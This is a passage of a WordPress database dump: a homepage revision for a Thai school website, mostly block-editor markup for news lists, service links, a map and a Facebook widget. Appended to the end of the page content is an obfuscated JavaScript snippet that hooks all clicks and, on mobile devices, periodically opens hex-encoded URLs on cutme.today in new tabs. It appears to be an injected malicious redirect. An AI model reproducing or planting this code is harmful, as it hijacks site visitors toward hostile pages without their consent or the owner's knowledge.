ategory-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-09 11:57:05','2024-08-09 04:57:05','',14,'http://pakhaeng.ssk.in.th/?p=783',0,'revision','',0),
